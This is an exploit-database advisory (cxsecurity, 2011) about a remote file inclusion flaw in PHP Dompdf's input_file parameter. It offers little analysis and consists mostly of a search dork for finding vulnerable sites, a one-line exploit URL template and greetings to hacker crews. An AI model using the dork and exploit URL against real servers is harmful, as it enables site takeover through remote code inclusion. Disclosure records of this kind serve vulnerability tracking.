PHP Dompdf File RFI Vulnerability

2011.01.15
Credit: jos_ali_joe
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

================================== PHP Dompdf File RFI Vulnerability ================================== [+]Title : PHP Dompdf File RFI Vulnerability [+]Software : Dompdf Php5 [+]Vendor : NN [+]Download : NN [+]Author : jos_ali_joe [+]Contact : josalijoe[at]hotmail[dot]com [+]Web : http://alicoder.wordpress.com/ ( New Blog jos_ali_joe ) [+]Home : http://indonesiancoder.com/ & http://explorecrew.org/ .___ .___ .__ _________ .___ | | ____ __| _/ ____ ____ ____ ______|__|_____ ____ \_ ___ \ ____ __| _/ ____ _______ | | / \ / __ | / _ \ / \ _/ __ \ / ___/| |\__ \ / \ / \ \/ / _ \ / __ | _/ __ \ \_ __ \ | || | \/ /_/ | ( <_> )| | \\ ___/ \___ \ | | / __ \_| | \\ \____( <_> )/ /_/ | \ ___/ | | \/ |___||___| /\____ | \____/ |___| / \___ >/____ >|__|(____ /|___| / \______ / \____/ \____ | \___ > |__| \/ \/ \/ \/ \/ \/ \/ \/ \/ \/ ######################################################################## Dork : inurl:"dompdf/dompdf.php?input_file=" ######################################################################## ------------------------------------------------------------------------ RFI Exploit http://127.0.0.1/[path]/dompdf/dompdf.php?input_file= [joslijoe.txt] -------------------------------------------------------------------------- Greets For : ./Devilzc0de crew - Kebumen Cyber - Indonesian Hacker - Tecon Crew - Magelang Cyber - Malang Cyber - kill-9 ./Byroe Net - Yogya Carderlink - aten4 - Wannabe Hacker - Tecon Crew - DuniaSantai.com - All Underground Forum Indonesia My Team : ./Indonesian Coder & Explore Crew Special Thanks : Security Reason - Packetstorm Security [+] Note : Hacking bukanlah tentang jawaban. Hacking adalah tentang jalan yang kamu ambil untuk mencari jawaban. Jika kamu membutuhkan bantuan, Jangan bertanya untuk mendapatkan jawaban, Bertanyalah tentang jalan yang harus kamu ambil untuk mencari jawaban untuk dirimu sendiri.

References:

http://alicoder.wordpress.com/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top